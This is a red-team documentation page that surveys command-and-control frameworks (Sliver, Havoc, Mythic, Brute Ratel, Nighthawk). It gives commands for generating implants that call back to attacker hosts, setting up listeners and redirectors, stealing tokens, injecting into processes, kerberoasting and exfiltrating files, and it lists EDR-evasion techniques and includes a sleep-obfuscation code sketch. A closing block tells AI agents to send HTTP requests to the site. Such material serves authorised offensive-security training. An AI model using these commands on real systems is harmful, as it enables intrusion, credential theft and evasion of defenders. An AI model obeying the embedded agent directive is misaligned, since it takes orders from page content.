# Modern C2 Frameworks

Command and Control frameworks for red team operations (2024-2025).

> **Skill Level**: Advanced\
> **Prerequisites**: Network protocols, evasion techniques, operational security

## Framework Comparison

| Framework     | Language  | License     | Evasion   | Comms                  |
| ------------- | --------- | ----------- | --------- | ---------------------- |
| Sliver        | Go        | Open Source | Good      | mTLS, HTTP(S), DNS, WG |
| Havoc         | C/C++     | Open Source | Excellent | HTTP(S), SMB           |
| Mythic        | Python/Go | Open Source | Good      | Multiple agents        |
| Brute Ratel   | C/C++     | Commercial  | Excellent | HTTP(S), DNS, SMB      |
| Nighthawk     | C++       | Commercial  | Excellent | HTTP(S), DNS           |
| Cobalt Strike | Java      | Commercial  | Good      | HTTP(S), DNS, SMB      |

## Sliver

### Installation

```bash
# Download latest release
curl https://sliver.sh/install | sudo bash

# Or build from source
git clone https://github.com/BishopFox/sliver.git
cd sliver
make

# Start server
./sliver-server
```

### Implant Generation

```bash
# Generate beacon (recommended - async)
sliver > generate beacon --http https://teamserver.com --save /tmp/beacon.exe

# Generate session (interactive)
sliver > generate --mtls teamserver.com --save /tmp/session.exe

# Linux implant
sliver > generate beacon --http https://teamserver.com --os linux --arch amd64

# macOS
sliver > generate beacon --http https://teamserver.com --os darwin --arch amd64

# Staged payload (smaller)
sliver > generate stager --lhost teamserver.com --lport 8443 --protocol http

# Shellcode output
sliver > generate beacon --http https://teamserver.com --format shellcode
```

### Listeners

```bash
# HTTPS listener
sliver > https --lhost 0.0.0.0 --lport 443 --domain legitimate.com

# mTLS listener
sliver > mtls --lhost 0.0.0.0 --lport 8888

# DNS listener
sliver > dns --domains evil.com --lport 53

# WireGuard listener
sliver > wg --lport 51820
```

### Operations

```bash
# List sessions/beacons
sliver > sessions
sliver > beacons

# Interact with beacon
sliver > use <BEACON_ID>

# Execute commands
sliver (BEACON) > shell
sliver (BEACON) > execute -o whoami

# File operations
sliver (BEACON) > download C:\\Users\\admin\\Desktop\\secrets.txt
sliver (BEACON) > upload /tmp/tool.exe C:\\Windows\\Temp\\tool.exe

# Process operations
sliver (BEACON) > ps
sliver (BEACON) > migrate <PID>

# Pivoting
sliver (BEACON) > pivots tcp --bind 0.0.0.0:1234

# Built-in tools
sliver (BEACON) > seatbelt
sliver (BEACON) > sharpup
```

### Evasion Features

```bash
# Obfuscation during generation
sliver > generate beacon --http https://ts.com --skip-symbols --debug

# Process injection
sliver (BEACON) > execute-assembly /path/to/tool.exe

# In-memory .NET execution
sliver (BEACON) > execute-assembly /path/to/Rubeus.exe kerberoast
```

## Havoc

### Installation

```bash
# Clone repository
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc

# Build teamserver
cd teamserver
go build -o teamserver cmd/server/main.go

# Build client
cd ../client
mkdir build && cd build
cmake ..
make

# Start teamserver
./teamserver server --profile profiles/havoc.yaotl
```

### Demon Generation

```bash
# Via GUI or profile
# Havoc uses "Demons" as implants

# Profile example (havoc.yaotl)
Demon {
    Sleep: 5
    Jitter: 20
    
    Injection {
        Spawn64: "C:\\Windows\\System32\\notepad.exe"
        Spawn32: "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}
```

### Features

```
Key Havoc capabilities:
- Indirect syscalls
- Hardware breakpoint hooks
- Sleep obfuscation
- Return address spoofing
- Module stomping
- BOF (Beacon Object Files) support
- Token manipulation
```

### Operations

```bash
# In Havoc GUI:
# Interact with Demon
# Right-click → Interact

# Execute commands
shell whoami

# Load BOF
inline-execute /path/to/bof.o args

# Process injection
inject <PID> shellcode

# Token operations  
token list
token steal <PID>
token make <user> <pass>
```

## Mythic

### Installation

```bash
# Clone repository
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic

# Install
./mythic-cli install github https://github.com/MythicAgents/Apollo.git
./mythic-cli install github https://github.com/MythicAgents/poseidon.git
./mythic-cli install github https://github.com/MythicC2Profiles/http.git

# Start
./mythic-cli start

# Access web UI
# https://localhost:7443
# Default: mythic_admin / random (check ./mythic-cli config get MYTHIC_ADMIN_PASSWORD)
```

### Available Agents

```
Apollo - Windows C# agent
Poseidon - macOS/Linux Go agent
Medusa - Python agent
Merlin - Go cross-platform
Nimplant - Nim-based
```

### Payload Generation

```bash
# Via web interface:
# 1. Payloads → Create Payload
# 2. Select Agent (Apollo, Poseidon, etc.)
# 3. Select C2 Profile (HTTP, websocket, etc.)
# 4. Configure callback settings
# 5. Build

# Apollo example:
# - C2 Profile: HTTP
# - Callback host: https://teamserver.com
# - Callback interval: 10
# - Jitter: 23%
```

### Operations

```
# Mythic uses web UI primarily
# Key operations available:

File Browser - Navigate target filesystem
Process List - View/inject processes  
Shell - Execute commands
Upload/Download - File transfer
Screenshots - Capture screen
Keylog - Keylogging
SOCKS - Proxy tunneling
```

## Brute Ratel C4 (Commercial)

### Overview

```
Commercial framework known for:
- Exceptional EDR evasion
- Syscall-based operations
- Sleep masking
- CFG/CIG bypass
- Memory-only execution
```

### Key Features

```
Badger (agent) capabilities:
- Direct/Indirect syscalls
- Hardware breakpoint hooking
- Stack spoofing
- Sleep obfuscation (encrypts memory)
- AMSI/ETW bypass
- User-defined reflective loader
```

### Operational Concepts

```
# Typical workflow:
1. Configure listener (HTTP/HTTPS/DNS/SMB)
2. Generate Badger payload
3. Deploy to target
4. Interact via GUI

# Advanced features:
- Lateral movement templates
- Token manipulation
- BOF support
- LDAP integration
- Credential harvesting
```

## Nighthawk (Commercial)

### Overview

```
MDSec's commercial framework:
- Position-independent code
- Extensive anti-analysis
- Sleep obfuscation
- Custom memory allocator
- Multiple protocols
```

### Features

```
Key capabilities:
- Syscall evasion
- Module stomping
- Sleep encryption
- Beacon object files
- Token manipulation
- Kerberos operations
- LDAP queries
- WMI/SMB lateral movement
```

## Evasion Techniques

### Common to Modern C2s

```
1. Sleep Obfuscation
   - Encrypt beacon memory during sleep
   - Avoid memory scanners

2. Indirect Syscalls
   - Avoid ntdll.dll hooks
   - Call syscalls directly

3. API Hashing
   - Resolve APIs at runtime
   - Avoid import table detection

4. Return Address Spoofing
   - Fake legitimate call stack
   - Bypass stack-based detection

5. Hardware Breakpoints
   - Hook without modifying code
   - Avoid hook detection

6. Module Stomping
   - Overwrite legitimate DLL memory
   - Appear as normal module
```

### Sleep Obfuscation Example

```c
// Concept: Encrypt beacon in memory during sleep

void sleep_obfuscated(DWORD milliseconds) {
    // 1. Save current memory state
    void* beacon_memory = get_beacon_memory();
    size_t beacon_size = get_beacon_size();
    
    // 2. Encrypt memory
    encrypt_memory(beacon_memory, beacon_size, key);
    
    // 3. Change memory permissions
    VirtualProtect(beacon_memory, beacon_size, PAGE_NOACCESS, &old);
    
    // 4. Sleep
    SleepEx(milliseconds, FALSE);
    
    // 5. Restore permissions
    VirtualProtect(beacon_memory, beacon_size, PAGE_EXECUTE_READWRITE, &old);
    
    // 6. Decrypt memory
    decrypt_memory(beacon_memory, beacon_size, key);
}
```

## C2 Infrastructure

### Redirectors

```bash
# Use redirectors to hide C2 server

# socat redirector
socat TCP4-LISTEN:80,fork TCP4:c2server.internal:80

# iptables redirector
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination C2_IP:80

# Apache mod_rewrite
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/api/v1/.*
RewriteRule ^(.*)$ https://c2server.internal$1 [P]
```

### Domain Fronting

```
Use CDN to mask C2 traffic:
1. SNI shows: legitimate.cloudfront.net
2. Host header: c2.cloudfront.net
3. CDN routes based on Host header
4. Network sees legitimate CDN traffic
```

### Malleable Profiles

```
Customize C2 traffic to mimic legitimate applications:
- User-agent strings
- URI patterns
- Request/response headers
- Body encoding
- Jitter and sleep intervals
```

## Related Topics

* [RT/EDR Evasion](/others/rt-edr.md) - Evasion techniques
* [Windows Post-Exploitation](/post-exploitation/windows.md) - Windows operations
* [Reverse Shells](/exploitation/reverse-shells.md) - Initial access


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentest-book.com/exploitation/modern-c2.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.